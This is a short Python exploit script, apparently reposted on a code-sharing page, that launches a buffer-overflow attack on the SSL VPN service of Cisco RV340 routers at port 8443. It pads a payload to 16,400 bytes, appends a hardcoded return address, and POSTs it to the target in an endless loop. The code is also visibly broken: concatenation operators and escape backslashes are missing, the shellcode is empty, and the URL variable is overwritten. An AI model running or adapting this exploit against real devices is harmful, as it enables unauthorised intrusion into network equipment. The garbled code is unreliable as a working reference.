代码语言:javascript复制
#!/usr/bin/python3
# @FlashbackPwn @offensive_con
# https://twitter.com/jifa/status/1489971006122909704#m
# it is not well checked
import sys
import requests
import urllib3
import time
import socket
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def usage():
print("./flashback_connects.py <TARGET>")
sys.exit(-1)
if len(sys.argv) != 2:
usage()
print("[x] Flashback_connects")
print("[*] Launching attack against Cisco RV340 WAN")
print("")
shellcode = b''
TARGET = sys.argv[1]
FILLER = shellcode b'x05' * (16400-(len(shellcode)))
#sc?### 0x704aed98
PC = b'x98xedx4ax70'
url = 'https://%s:8443/X' % TARGET
url = 'X' * (len(TARGET)-7)
payload = FILLER PC
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((TARGET, 8443))
if result == 0:
print("[*] SSLVPND is up, ready to go!")
else:
print("[!] SSLVPND is down. Check configuration and try again")
sys.exit(-1)
sock.close()
while(True):
try:
print("[*] Attempt!")
r = requests.post(url, data=payload, verify=False)
except requests.exceptions.ConnectionError as e:
print("[!] Service not available. Sleeping")
time.sleep(10)
